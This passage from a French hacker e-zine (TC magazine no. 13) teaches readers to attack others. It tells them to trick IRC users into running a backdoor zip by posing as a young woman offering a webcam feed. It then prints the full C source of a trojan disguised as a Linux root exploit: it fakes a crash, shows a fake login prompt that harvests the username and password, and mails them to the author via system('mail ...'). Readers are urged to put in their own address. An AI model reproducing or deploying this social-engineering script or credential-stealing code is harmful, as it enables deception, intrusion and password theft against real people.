Et voil…, le disque C de la cible est devenu mon disque K: Super non ? Vous
pouvez alors tout visiter et foutre le bordel.

2) DeuxiŠme technique avec le port 666
======================================

Cette technique est trŠs simple... il vous suffit d'envoyer le fichier
envoi.zip que vous trouverez sur le site. Il faut que votre victime accepte
votre fichier, le dezip et l'ouvre. Ensuite vous ouvrez votre WS_FTP
et vous vous connecter sur le port 666 et vous vous trouverez dans le hard
disk de la victime.... :o)

(Note : Seulement possible avec WS-FTP)

- Comment envoyer le fichier a votre victime?

C'est simple... vous aller sur IRC, vous vous donnez un nick de fille
(ex.: Julie20), vous vous trouvez votre victime et vous dite que vous avez
une cam‚ra et que si il veut vous voir il ne suffit d'accepter votre fichier
et de l'ouvrir et il vous verra en direct.. ils refusent rarement. Si il vous
dit qu'il a peur que se soit un virus, demandez-y si il a un anti-virus et
il vous r‚pondra surement oui... alors vous lui r‚pondez de quoi tu as peur?
Vous insistez pas trop sinon il va se douter de quelque chose... et voila,
c'est trŠs simple....

Vous pouvez aussi envoyer le fichier envoi.zip dans un ftp et attendre que la
victime l'ouvre et vous allez pouvoir prendre tous les fichier du ftp, et meme
de tout son hard disk... :-)

(Conseil de Err418 : Ce qui va le mieux c'est de renommer le fichier
webcam.exe et de le zipper sous webcam.zip et de le sender … sa victime :-)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Un super de bon exploit pour ALLLLLLLLLLLLLLLLL LINuX !! yeah !
Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Just look ceci est un FAUX exploit et si vous le runner sur votre
machine, il va me e-mailer la passwd file... super cool.

Prenez ce programme C et modifier le pour que la passwd file soit e-mail‚
directement a vous.

Voici en exemple le prog. qui me emailerais la passwd file … moi !!!!

---------Cut hErE--------------------
/* FTP hole bug [05/01/98]
* Affected Operating Systems: ALL LINUX
* Exploitation Result: USers get root suid big on login rhost
*
* Syntax:
* user~$ cc -o suid19 suid19.c
* user~$ ./suid19
*
* it will then test and core dump an rhost file on your home dir with a suid bit
* then it'll bring you to a login screen and you login as normal and then
* using the rhost file with a suid bit you have a root shell
*
* www:~$ id
* root
*
* pheer!!
*/



#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>
typedef struct
{
char id[9];
char password[9];
} login;
login loginfake;
void scanend(char *string);
void testX();
void pimpthem();
void fakelogin();
void sttystuff();
void emailus();
void main()
{
printf("
Searching for local ftpd bugs.\n");
testX();
pimpthem();
sttystuff();
fakelogin();
emailus();

}

void scanend(char *string)
{
int count;
for(count=0;count<78;count++)
{
if(string[count]==10) string[count]=0;
if(string[count]==13) string[count]=0;
}
}

void testX()
{
char xterm[] = "
xterm";
char xtermcolor[] = "
xterm-color";
char rxvt[] = "
rxvt";
char rxvtcolor[] = "
rxvt-color";
char nxterm[] = "
nxterm";
char noX[] = "
You are in X, please exit to run this program";
if(! (strcmp(getenv("
TERM"), xterm)))
{
printf("
%c\n",noX);
exit(-1);
}
if( (!strcmp(getenv("
TERM"), xtermcolor)))
{
printf("
%c\n",noX);
exit(-1);
}
if(! (strcmp(getenv("
TERM"), rxvt)))
{
printf("
%c\n",noX);
exit(-1);
}
if(!(strcmp(getenv("
TERM"),rxvtcolor)))
{
printf("
%c\n",noX);
exit(-1);
}
if(!(strcmp(getenv("
TERM"),nxterm)))
{
printf("
%c\n",noX);
exit(-1);
}
}

void pimpthem()
{
printf("
\n");
printf("
.\n");
sleep( 1 );
printf("
.\n");
sleep( 1 );
printf("
.\n");
sleep( 1 );
printf("
found buffer overide bug iSegmentation Fault (core dumped)\n");
sleep( 1 );
system("
clear");

}

void fakelogin()
{
char *input1[10]={0};
char input[10];
char var[80] = {0};
char buffer[80] = {0};
FILE *fp;
FILE *file;
char hostname[80]={0};
FILE *hostnamefile;

fp = popen("
cat /etc/issue.net", "r");
fread(var, 80, 1, fp);

printf("
\n");
printf("
%s",var);
printf("
\n");

hostnamefile=fopen("
/etc/HOSTNAME","r");
fread(hostname,78,1,hostnamefile);
scanend(hostname);
printf("
%s login: ",hostname);
gets(input);

*input1=getpass("
Password: ");
printf("
\n");

printf("
/bin/cat cannot open /etc/motd cought buffer overide!\n");
printf("
opening system fix shell, run fsck\n");

strcpy(loginfake.id, input);
strcpy(loginfake.password, *input1);

file = fopen("
mirror.txt","w");
fprintf(file, "
username:%s\npassword:%s\nUID:%i",loginfake.id, loginfake.password, getuid());
fclose(file);
}

void emailus()
{
char guilly[] = "
err418@technologist.com";
char thegza[] = "
err418@technologist.com";
char *foo;
char *poo;

foo=(char *)malloc(4096);
sprintf(foo, "
mail %s < mirror.txt",guilly);
poo=(char *)malloc(4096);
sprintf(poo, "
mail %s < mirror.txt",thegza);
system(foo);
system(poo);
}

void sttystuff()
{
system("
stty susp ^G");
system("
stty intr ^Q");
}
---------Cut hErE--------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
0=----------=0
| Conclusion |
0=----------=0
Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Ok ! Voici ce qui close ce num‚ro 13 de TC magazine.. j'espŠre que
vous en avez appris...

On se revoie le 13 juin prochain... see ya !

(-=-=-=-=-=-=-=-=-=-=-=-=-=-=Fin de la transmission-=-=-=-=-=-=-=-=-=-=-=-=-=)

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT